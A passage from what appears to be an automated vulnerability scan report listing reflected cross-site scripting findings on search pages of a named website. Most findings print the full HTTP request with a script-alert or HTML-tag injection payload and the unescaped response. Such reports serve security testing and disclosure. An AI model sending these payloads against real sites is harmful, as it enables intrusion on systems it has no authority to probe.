The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e690d<script>alert(1)</script>9e3711ac5bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&e690d<script>alert(1)</script>9e3711ac5bf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&e690d<script>alert(1)</script>9e3711ac5bf=1 was not found on this server.</p>
...[SNIP]...

2.779. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2b0b5<a>1f939491693 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=22b0b5<a>1f939491693 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=22b0b5<a>1f939491693 was not found on this server.</p>
...[SNIP]...

2.780. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4377f<script>alert(1)</script>ec763c2e9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication4377f<script>alert(1)</script>ec763c2e9d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication4377f<script>alert(1)</script>ec763c2e9d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.781. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe8d0<script>alert(1)</script>b217353946b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesfe8d0<script>alert(1)</script>b217353946b/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesfe8d0<script>alert(1)</script>b217353946b/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.782. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e45e0<script>alert(1)</script>cfc1878c9c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmose45e0<script>alert(1)</script>cfc1878c9c7/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmose45e0<script>alert(1)</script>cfc1878c9c7/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.783. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7eb5f<script>alert(1)</script>7590bc05d8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images7eb5f<script>alert(1)</script>7590bc05d8a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images7eb5f<script>alert(1)</script>7590bc05d8a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.784. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12997<script>alert(1)</script>c2c2ff97460 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/search.php12997<script>alert(1)</script>c2c2ff97460?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php12997<script>alert(1)</script>c2c2ff97460?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.785. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 57844<a>814c68a6beb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search57844<a>814c68a6beb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search57844<a>814c68a6beb&opt=2 was not found on this server.</p>
...[SNIP]...

2.786. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c0d06<a>c1501ebd4b2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...c0d06<a>c1501ebd4b2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php?keyword=search...c0d06<a>c1501ebd4b2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.787. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 21c75<script>alert(1)</script>ab4fd050b7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&21c75<script>alert(1)</script>ab4fd050b7f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&21c75<script>alert(1)</script>ab4fd050b7f=1 was not found on this server.</p>
...[SNIP]...

2.788. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 79cc8<a>2b7b9108c0e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=279cc8<a>2b7b9108c0e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=279cc8<a>2b7b9108c0e was not found on this server.</p>
...[SNIP]...

2.789. http://www.resellerbase.com/communication/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 390c5<script>alert(1)</script>b6a62062968 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication390c5<script>alert(1)</script>b6a62062968/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication390c5<script>alert(1)</script>b6a62062968/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.790. http://www.resellerbase.com/communication/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9c88<script>alert(1)</script>f195a30ed0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesf9c88<script>alert(1)</script>f195a30ed0b/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesf9c88<script>alert(1)</script>f195a30ed0b/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.791. http://www.resellerbase.com/communication/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 29aec<script>alert(1)</script>b69e479e0d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos29aec<script>alert(1)</script>b69e479e0d2/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos29aec<script>alert(1)</script>b69e479e0d2/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.792. http://www.resellerbase.com/communication/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9ed3<script>alert(1)</script>87198f380ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/search.phpc9ed3<script>alert(1)</script>87198f380ff?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.phpc9ed3<script>alert(1)</script>87198f380ff?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.793. http://www.resellerbase.com/communication/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a6dfa<a>735c9128d51 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/search.php?keyword=search...&Submit3=Searcha6dfa<a>735c9128d51&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.php?keyword=search...&Submit3=Searcha6dfa<a>735c9128d51&opt=2 was not found on this server.</p>
...[SNIP]...

2.794. http://www.resellerbase.com/communication/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7fb49<a>ee8ec6146a2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/search.php?keyword=search...7fb49<a>ee8ec6146a2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.php?keyword=search...7fb49<a>ee8ec6146a2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.795. http://www.resellerbase.com/communication/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d079<script>alert(1)</script>0ab1bc85617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3d079<script>alert(1)</script>0ab1bc85617=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3d079<script>alert(1)</script>0ab1bc85617=1 was not found on this server.</p>
...[SNIP]...

2.796. http://www.resellerbase.com/communication/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
